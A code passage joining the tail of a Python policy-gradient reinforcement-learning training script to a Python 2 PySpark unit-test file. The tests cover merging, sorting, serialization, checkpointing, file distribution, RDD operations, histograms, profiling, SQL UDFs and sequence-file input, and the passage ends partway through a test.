logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages',
'-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + \
'_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10 * e
print('Running experiment with seed %d' % seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir, '%d' % seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
tests.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for PySpark; additional tests are implemented as doctests in
individual modules.
"""
from array import array
from fileinput import input
from glob import glob
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import zipfile
import random
import threading
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.conf import SparkConf
from pyspark.context import SparkContext
from pyspark.files import SparkFiles
from pyspark.serializers import read_int, BatchedSerializer, MarshalSerializer, PickleSerializer, \
CloudPickleSerializer
from pyspark.shuffle import Aggregator, InMemoryMerger, ExternalMerger, ExternalSorter
from pyspark.sql import SQLContext, IntegerType, Row
from pyspark import shuffle
_have_scipy = False
_have_numpy = False
try:
import scipy.sparse
_have_scipy = True
except:
# No SciPy, but that's okay, we'll skip those tests
pass
try:
import numpy as np
_have_numpy = True
except:
# No NumPy, but that's okay, we'll skip those tests
pass
SPARK_HOME = os.environ["SPARK_HOME"]
class MergerTests(unittest.TestCase):
def setUp(self):
self.N = 1 << 14
self.l = [i for i in xrange(self.N)]
self.data = zip(self.l, self.l)
self.agg = Aggregator(lambda x: [x],
lambda x, y: x.append(y) or x,
lambda x, y: x.extend(y) or x)
def test_in_memory(self):
m = InMemoryMerger(self.agg)
m.mergeValues(self.data)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = InMemoryMerger(self.agg)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_small_dataset(self):
m = ExternalMerger(self.agg, 1000)
m.mergeValues(self.data)
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 1000)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data))
self.assertEqual(m.spills, 0)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
def test_medium_dataset(self):
m = ExternalMerger(self.agg, 10)
m.mergeValues(self.data)
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)))
m = ExternalMerger(self.agg, 10)
m.mergeCombiners(map(lambda (x, y): (x, [y]), self.data * 3))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(sum(v) for k, v in m.iteritems()),
sum(xrange(self.N)) * 3)
def test_huge_dataset(self):
m = ExternalMerger(self.agg, 10, partitions=3)
m.mergeCombiners(map(lambda (k, v): (k, [str(v)]), self.data * 10))
self.assertTrue(m.spills >= 1)
self.assertEqual(sum(len(v) for k, v in m._recursive_merged_items(0)),
self.N * 10)
m._cleanup()
class SorterTests(unittest.TestCase):
def test_in_memory_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1024)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
def test_external_sort(self):
l = range(1024)
random.shuffle(l)
sorter = ExternalSorter(1)
self.assertEquals(sorted(l), list(sorter.sorted(l)))
self.assertGreater(shuffle.DiskBytesSpilled, 0)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, reverse=True), list(sorter.sorted(l, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x), list(sorter.sorted(l, key=lambda x: -x)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
last = shuffle.DiskBytesSpilled
self.assertEquals(sorted(l, key=lambda x: -x, reverse=True),
list(sorter.sorted(l, key=lambda x: -x, reverse=True)))
self.assertGreater(shuffle.DiskBytesSpilled, last)
def test_external_sort_in_rdd(self):
conf = SparkConf().set("spark.python.worker.memory", "1m")
sc = SparkContext(conf=conf)
l = range(10240)
random.shuffle(l)
rdd = sc.parallelize(l, 10)
self.assertEquals(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
class SerializationTestCase(unittest.TestCase):
def test_namedtuple(self):
from collections import namedtuple
from cPickle import dumps, loads
P = namedtuple("P", "x y")
p1 = P(1, 3)
p2 = loads(dumps(p1, 2))
self.assertEquals(p1, p2)
def test_itemgetter(self):
from operator import itemgetter
ser = CloudPickleSerializer()
d = range(10)
getter = itemgetter(1)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = itemgetter(0, 3)
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
def test_attrgetter(self):
from operator import attrgetter
ser = CloudPickleSerializer()
class C(object):
def __getattr__(self, item):
return item
d = C()
getter = attrgetter("a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("a", "b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
d.e = C()
getter = attrgetter("e.a")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
getter = attrgetter("e.a", "e.b")
getter2 = ser.loads(ser.dumps(getter))
self.assertEqual(getter(d), getter2(d))
# Regression test for SPARK-3415
def test_pickling_file_handles(self):
ser = CloudPickleSerializer()
out1 = sys.stderr
out2 = ser.loads(ser.dumps(out1))
self.assertEquals(out1, out2)
def test_func_globals(self):
class Unpicklable(object):
def __reduce__(self):
raise Exception("not picklable")
global exit
exit = Unpicklable()
ser = CloudPickleSerializer()
self.assertRaises(Exception, lambda: ser.dumps(exit))
def foo():
sys.exit(0)
self.assertTrue("exit" in foo.func_code.co_names)
ser.dumps(foo)
class PySparkTestCase(unittest.TestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
self.sc = SparkContext('local[4]', class_name, batchSize=2)
def tearDown(self):
self.sc.stop()
sys.path = self._old_sys_path
class ReusedPySparkTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.sc = SparkContext('local[4]', cls.__name__, batchSize=2)
@classmethod
def tearDownClass(cls):
cls.sc.stop()
class CheckpointTests(ReusedPySparkTestCase):
def setUp(self):
self.checkpointDir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(self.checkpointDir.name)
self.sc.setCheckpointDir(self.checkpointDir.name)
def tearDown(self):
shutil.rmtree(self.checkpointDir.name)
def test_basic_checkpointing(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: range(1, x + 1))
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
result = flatMappedRDD.collect()
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.isCheckpointed())
self.assertEqual(flatMappedRDD.collect(), result)
self.assertEqual("file:" + self.checkpointDir.name,
os.path.dirname(os.path.dirname(flatMappedRDD.getCheckpointFile())))
def test_checkpoint_and_restore(self):
parCollection = self.sc.parallelize([1, 2, 3, 4])
flatMappedRDD = parCollection.flatMap(lambda x: [x])
self.assertFalse(flatMappedRDD.isCheckpointed())
self.assertTrue(flatMappedRDD.getCheckpointFile() is None)
flatMappedRDD.checkpoint()
flatMappedRDD.count() # forces a checkpoint to be computed
time.sleep(1) # 1 second
self.assertTrue(flatMappedRDD.getCheckpointFile() is not None)
recovered = self.sc._checkpointFile(flatMappedRDD.getCheckpointFile(),
flatMappedRDD._jrdd_deserializer)
self.assertEquals([1, 2, 3, 4], recovered.collect())
class AddFileTests(PySparkTestCase):
def test_add_py_file(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this job fails due to `userlibrary` not being on the Python path:
# disable logging in log4j temporarily
log4j = self.sc._jvm.org.apache.log4j
old_level = log4j.LogManager.getRootLogger().getLevel()
log4j.LogManager.getRootLogger().setLevel(log4j.Level.FATAL)
def func(x):
from userlibrary import UserClass
return UserClass().hello()
self.assertRaises(Exception,
self.sc.parallelize(range(2)).map(func).first)
log4j.LogManager.getRootLogger().setLevel(old_level)
# Add the file, so the job should now succeed:
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addPyFile(path)
res = self.sc.parallelize(range(2)).map(func).first()
self.assertEqual("Hello World!", res)
def test_add_file_locally(self):
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
self.sc.addFile(path)
download_path = SparkFiles.get("hello.txt")
self.assertNotEqual(path, download_path)
with open(download_path) as test_file:
self.assertEquals("Hello World!\n", test_file.readline())
def test_add_py_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlibrary import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlibrary.py")
self.sc.addFile(path)
from userlibrary import UserClass
self.assertEqual("Hello World!", UserClass().hello())
def test_add_egg_file_locally(self):
# To ensure that we're actually testing addPyFile's effects, check that
# this fails due to `userlibrary` not being on the Python path:
def func():
from userlib import UserClass
self.assertRaises(ImportError, func)
path = os.path.join(SPARK_HOME, "python/test_support/userlib-0.1-py2.7.egg")
self.sc.addPyFile(path)
from userlib import UserClass
self.assertEqual("Hello World from inside a package!", UserClass().hello())
def test_overwrite_system_module(self):
self.sc.addPyFile(os.path.join(SPARK_HOME, "python/test_support/SimpleHTTPServer.py"))
import SimpleHTTPServer
self.assertEqual("My Server", SimpleHTTPServer.__name__)
def func(x):
import SimpleHTTPServer
return SimpleHTTPServer.__name__
self.assertEqual(["My Server"], self.sc.parallelize(range(1)).map(func).collect())
class RDDTests(ReusedPySparkTestCase):
def test_id(self):
rdd = self.sc.parallelize(range(10))
id = rdd.id()
self.assertEqual(id, rdd.id())
rdd2 = rdd.map(str).filter(bool)
id2 = rdd2.id()
self.assertEqual(id + 1, id2)
self.assertEqual(id2, rdd2.id())
def test_save_as_textfile_with_unicode(self):
# Regression test for SPARK-970
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_save_as_textfile_with_utf8(self):
x = u"\u00A1Hola, mundo!"
data = self.sc.parallelize([x.encode("utf-8")])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsTextFile(tempFile.name)
raw_contents = ''.join(input(glob(tempFile.name + "/part-0000*")))
self.assertEqual(x, unicode(raw_contents.strip(), "utf-8"))
def test_transforming_cartesian_result(self):
# Regression test for SPARK-1034
rdd1 = self.sc.parallelize([1, 2])
rdd2 = self.sc.parallelize([3, 4])
cart = rdd1.cartesian(rdd2)
result = cart.map(lambda (x, y): x + y).collect()
def test_transforming_pickle_file(self):
# Regression test for SPARK-2601
data = self.sc.parallelize(["Hello", "World!"])
tempFile = tempfile.NamedTemporaryFile(delete=True)
tempFile.close()
data.saveAsPickleFile(tempFile.name)
pickled_file = self.sc.pickleFile(tempFile.name)
pickled_file.map(lambda x: x).collect()
def test_cartesian_on_textfile(self):
# Regression test for
path = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
a = self.sc.textFile(path)
result = a.cartesian(a).collect()
(x, y) = result[0]
self.assertEqual("Hello World!", x.strip())
self.assertEqual("Hello World!", y.strip())
def test_deleting_input_files(self):
# Regression test for SPARK-1025
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write("Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
self.assertRaises(Exception, lambda: filtered_data.count())
def test_sampling_default_seed(self):
# Test for SPARK-3995 (default seed setting)
data = self.sc.parallelize(range(1000), 1)
subset = data.takeSample(False, 10)
self.assertEqual(len(subset), 10)
def testAggregateByKey(self):
data = self.sc.parallelize([(1, 1), (1, 1), (3, 2), (5, 1), (5, 3)], 2)
def seqOp(x, y):
x.add(y)
return x
def combOp(x, y):
x |= y
return x
sets = dict(data.aggregateByKey(set(), seqOp, combOp).collect())
self.assertEqual(3, len(sets))
self.assertEqual(set([1]), sets[1])
self.assertEqual(set([2]), sets[3])
self.assertEqual(set([1, 3]), sets[5])
def test_itemgetter(self):
rdd = self.sc.parallelize([range(10)])
from operator import itemgetter
self.assertEqual([1], rdd.map(itemgetter(1)).collect())
self.assertEqual([(2, 3)], rdd.map(itemgetter(2, 3)).collect())
def test_namedtuple_in_rdd(self):
from collections import namedtuple
Person = namedtuple("Person", "id firstName lastName")
jon = Person(1, "Jon", "Doe")
jane = Person(2, "Jane", "Doe")
theDoes = self.sc.parallelize([jon, jane])
self.assertEquals([jon, jane], theDoes.collect())
def test_large_broadcast(self):
N = 100000
data = [[float(i) for i in range(300)] for i in range(N)]
bdata = self.sc.broadcast(data) # 270MB
m = self.sc.parallelize(range(1), 1).map(lambda x: len(bdata.value)).sum()
self.assertEquals(N, m)
def test_large_closure(self):
N = 1000000
data = [float(i) for i in xrange(N)]
rdd = self.sc.parallelize(range(1), 1).map(lambda x: len(data))
self.assertEquals(N, rdd.first())
self.assertTrue(rdd._broadcast is not None)
rdd = self.sc.parallelize(range(1), 1).map(lambda x: 1)
self.assertEqual(1, rdd.first())
self.assertTrue(rdd._broadcast is None)
def test_zip_with_different_serializers(self):
a = self.sc.parallelize(range(5))
b = self.sc.parallelize(range(100, 105))
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
a = a._reserialize(BatchedSerializer(PickleSerializer(), 2))
b = b._reserialize(MarshalSerializer())
self.assertEqual(a.zip(b).collect(), [(0, 100), (1, 101), (2, 102), (3, 103), (4, 104)])
def test_zip_with_different_number_of_items(self):
a = self.sc.parallelize(range(5), 2)
# different number of partitions
b = self.sc.parallelize(range(100, 106), 3)
self.assertRaises(ValueError, lambda: a.zip(b))
# different number of batched items in JVM
b = self.sc.parallelize(range(100, 104), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# different number of items in one pair
b = self.sc.parallelize(range(100, 106), 2)
self.assertRaises(Exception, lambda: a.zip(b).count())
# same total number of items, but different distributions
a = self.sc.parallelize([2, 3], 2).flatMap(range)
b = self.sc.parallelize([3, 2], 2).flatMap(range)
self.assertEquals(a.count(), b.count())
self.assertRaises(Exception, lambda: a.zip(b).count())
def test_count_approx_distinct(self):
rdd = self.sc.parallelize(range(1000))
self.assertTrue(950 < rdd.countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(float).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(str).countApproxDistinct(0.04) < 1050)
self.assertTrue(950 < rdd.map(lambda x: (x, -x)).countApproxDistinct(0.04) < 1050)
rdd = self.sc.parallelize([i % 20 for i in range(1000)], 7)
self.assertTrue(18 < rdd.countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(float).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(str).countApproxDistinct() < 22)
self.assertTrue(18 < rdd.map(lambda x: (x, -x)).countApproxDistinct() < 22)
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.00000001))
self.assertRaises(ValueError, lambda: rdd.countApproxDistinct(0.5))
def test_histogram(self):
# empty
rdd = self.sc.parallelize([])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
self.assertRaises(ValueError, lambda: rdd.histogram(1))
# out of range
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0], rdd.histogram([0, 10])[1])
self.assertEquals([0, 0], rdd.histogram((0, 4, 10))[1])
# in range with one bucket
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals([4], rdd.histogram([0, 10])[1])
self.assertEquals([3, 1], rdd.histogram([0, 4, 10])[1])
# in range with one bucket exact match
self.assertEquals([4], rdd.histogram([1, 4])[1])
# out of range with two buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 5, 10])[1])
# out of range with two uneven buckets
rdd = self.sc.parallelize([10.01, -0.01])
self.assertEquals([0, 0], rdd.histogram([0, 4, 10])[1])
# in range with two buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two bucket and None
rdd = self.sc.parallelize([1, 2, 3, 5, 6, None, float('nan')])
self.assertEquals([3, 2], rdd.histogram([0, 5, 10])[1])
# in range with two uneven buckets
rdd = self.sc.parallelize([1, 2, 3, 5, 6])
self.assertEquals([3, 2], rdd.histogram([0, 5, 11])[1])
# mixed range with two uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.0, 11.01])
self.assertEquals([4, 3], rdd.histogram([0, 5, 11])[1])
# mixed range with four uneven buckets
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0, 199.0, 200.0, 200.1])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# mixed range with uneven buckets and NaN
rdd = self.sc.parallelize([-0.01, 0.0, 1, 2, 3, 5, 6, 11.01, 12.0,
199.0, 200.0, 200.1, None, float('nan')])
self.assertEquals([4, 2, 1, 3], rdd.histogram([0.0, 5.0, 11.0, 12.0, 200.0])[1])
# out of range with infinite buckets
rdd = self.sc.parallelize([10.01, -0.01, float('nan'), float("inf")])
self.assertEquals([1, 2], rdd.histogram([float('-inf'), 0, float('inf')])[1])
# invalid buckets
self.assertRaises(ValueError, lambda: rdd.histogram([]))
self.assertRaises(ValueError, lambda: rdd.histogram([1]))
self.assertRaises(ValueError, lambda: rdd.histogram(0))
self.assertRaises(TypeError, lambda: rdd.histogram({}))
# without buckets
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 4], [4]), rdd.histogram(1))
# without buckets single element
rdd = self.sc.parallelize([1])
self.assertEquals(([1, 1], [1]), rdd.histogram(1))
# without bucket no range
rdd = self.sc.parallelize([1] * 4)
self.assertEquals(([1, 1], [4]), rdd.histogram(1))
# without buckets basic two
rdd = self.sc.parallelize(range(1, 5))
self.assertEquals(([1, 2.5, 4], [2, 2]), rdd.histogram(2))
# without buckets with more requested than elements
rdd = self.sc.parallelize([1, 2])
buckets = [1 + 0.2 * i for i in range(6)]
hist = [1, 0, 0, 0, 1]
self.assertEquals((buckets, hist), rdd.histogram(5))
# invalid RDDs
rdd = self.sc.parallelize([1, float('inf')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
rdd = self.sc.parallelize([float('nan')])
self.assertRaises(ValueError, lambda: rdd.histogram(2))
# string
rdd = self.sc.parallelize(["ab", "ac", "b", "bd", "ef"], 2)
self.assertEquals([2, 2], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals((["ab", "ef"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
# mixed RDD
rdd = self.sc.parallelize([1, 4, "ab", "ac", "b"], 2)
self.assertEquals([1, 1], rdd.histogram([0, 4, 10])[1])
self.assertEquals([2, 1], rdd.histogram(["a", "b", "c"])[1])
self.assertEquals(([1, "b"], [5]), rdd.histogram(1))
self.assertRaises(TypeError, lambda: rdd.histogram(2))
def test_repartitionAndSortWithinPartitions(self):
rdd = self.sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)], 2)
repartitioned = rdd.repartitionAndSortWithinPartitions(2, lambda key: key % 2)
partitions = repartitioned.glom().collect()
self.assertEquals(partitions[0], [(0, 5), (0, 8), (2, 6)])
self.assertEquals(partitions[1], [(1, 3), (3, 8), (3, 8)])
def test_distinct(self):
rdd = self.sc.parallelize((1, 2, 3)*10, 10)
self.assertEquals(rdd.getNumPartitions(), 10)
self.assertEquals(rdd.distinct().count(), 3)
result = rdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
class ProfilerTests(PySparkTestCase):
def setUp(self):
self._old_sys_path = list(sys.path)
class_name = self.__class__.__name__
conf = SparkConf().set("spark.python.profile", "true")
self.sc = SparkContext('local[4]', class_name, batchSize=2, conf=conf)
def test_profiler(self):
def heavy_foo(x):
for i in range(1 << 20):
x = 1
rdd = self.sc.parallelize(range(100))
rdd.foreach(heavy_foo)
profiles = self.sc._profile_stats
self.assertEqual(1, len(profiles))
id, acc, _ = profiles[0]
stats = acc.value
self.assertTrue(stats is not None)
width, stat_list = stats.get_print_list([])
func_names = [func_name for fname, n, func_name in stat_list]
self.assertTrue("heavy_foo" in func_names)
self.sc.show_profiles()
d = tempfile.gettempdir()
self.sc.dump_profiles(d)
self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
class SQLTests(ReusedPySparkTestCase):
def setUp(self):
self.sqlCtx = SQLContext(self.sc)
def test_udf(self):
self.sqlCtx.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
[row] = self.sqlCtx.sql("SELECT twoArgs('test', 1)").collect()
self.assertEqual(row[0], 5)
def test_udf2(self):
self.sqlCtx.registerFunction("strlen", lambda string: len(string))
self.sqlCtx.inferSchema(self.sc.parallelize([Row(a="test")])).registerTempTable("test")
[res] = self.sqlCtx.sql("SELECT strlen(a) FROM test WHERE strlen(a) > 1").collect()
self.assertEqual(u"4", res[0])
def test_broadcast_in_udf(self):
bar = {"a": "aa", "b": "bb", "c": "abc"}
foo = self.sc.broadcast(bar)
self.sqlCtx.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
[res] = self.sqlCtx.sql("SELECT MYUDF('c')").collect()
self.assertEqual("abc", res[0])
[res] = self.sqlCtx.sql("SELECT MYUDF('')").collect()
self.assertEqual("", res[0])
def test_basic_functions(self):
rdd = self.sc.parallelize(['{"foo":"bar"}', '{"foo":"baz"}'])
srdd = self.sqlCtx.jsonRDD(rdd)
srdd.count()
srdd.collect()
srdd.schemaString()
srdd.schema()
# cache and checkpoint
self.assertFalse(srdd.is_cached)
srdd.persist()
srdd.unpersist()
srdd.cache()
self.assertTrue(srdd.is_cached)
self.assertFalse(srdd.isCheckpointed())
self.assertEqual(None, srdd.getCheckpointFile())
srdd = srdd.coalesce(2, True)
srdd = srdd.repartition(3)
srdd = srdd.distinct()
srdd.intersection(srdd)
self.assertEqual(2, srdd.count())
srdd.registerTempTable("temp")
srdd = self.sqlCtx.sql("select foo from temp")
srdd.count()
srdd.collect()
def test_distinct(self):
rdd = self.sc.parallelize(['{"a": 1}', '{"b": 2}', '{"c": 3}']*10, 10)
srdd = self.sqlCtx.jsonRDD(rdd)
self.assertEquals(srdd.getNumPartitions(), 10)
self.assertEquals(srdd.distinct().count(), 3)
result = srdd.distinct(5)
self.assertEquals(result.getNumPartitions(), 5)
self.assertEquals(result.count(), 3)
def test_apply_schema_to_row(self):
srdd = self.sqlCtx.jsonRDD(self.sc.parallelize(["""{"a":2}"""]))
srdd2 = self.sqlCtx.applySchema(srdd.map(lambda x: x), srdd.schema())
self.assertEqual(srdd.collect(), srdd2.collect())
rdd = self.sc.parallelize(range(10)).map(lambda x: Row(a=x))
srdd3 = self.sqlCtx.applySchema(rdd, srdd.schema())
self.assertEqual(10, srdd3.count())
def test_serialize_nested_array_and_map(self):
d = [Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})]
rdd = self.sc.parallelize(d)
srdd = self.sqlCtx.inferSchema(rdd)
row = srdd.first()
self.assertEqual(1, len(row.l))
self.assertEqual(1, row.l[0].a)
self.assertEqual("2", row.d["key"].d)
l = srdd.map(lambda x: x.l).first()
self.assertEqual(1, len(l))
self.assertEqual('s', l[0].b)
d = srdd.map(lambda x: x.d).first()
self.assertEqual(1, len(d))
self.assertEqual(1.0, d["key"].c)
row = srdd.map(lambda x: x.d["key"]).first()
self.assertEqual(1.0, row.c)
self.assertEqual("2", row.d)
def test_convert_row_to_dict(self):
row = Row(l=[Row(a=1, b='s')], d={"key": Row(c=1.0, d="2")})
self.assertEqual(1, row.asDict()['l'][0].a)
rdd = self.sc.parallelize([row])
srdd = self.sqlCtx.inferSchema(rdd)
srdd.registerTempTable("test")
row = self.sqlCtx.sql("select l[0].a AS la from test").first()
self.assertEqual(1, row.asDict()["la"])
class InputFormatTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
os.unlink(cls.tempdir.name)
cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name)
def test_sequencefiles(self):
basepath = self.tempdir.name
ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.assertEqual(ints, ei)
doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
"org.apache.hadoop.io.DoubleWritable",
"org.apache.hadoop.io.Text").collect())
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.assertEqual(doubles, ed)
bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BytesWritable").collect())
ebs = [(1, bytearray('aa', 'utf-8')),
(1, bytearray('aa', 'utf-8')),
(2, bytearray('aa', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(2, bytearray('bb', 'utf-8')),
(3, bytearray('cc', 'utf-8'))]
self.assertEqual(bytes, ebs)
text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
"org.apache.hadoop.io.Text",
"org.apache.hadoop.io.Text").collect())
et = [(u'1', u'aa'),
(u'1', u'aa'),
(u'2', u'aa'),
(u'2', u'bb'),
(u'2', u'bb'),
(u'3', u'cc')]
self.assertEqual(text, et)
bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.assertEqual(bools, eb)
nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.BooleanWritable").collect())
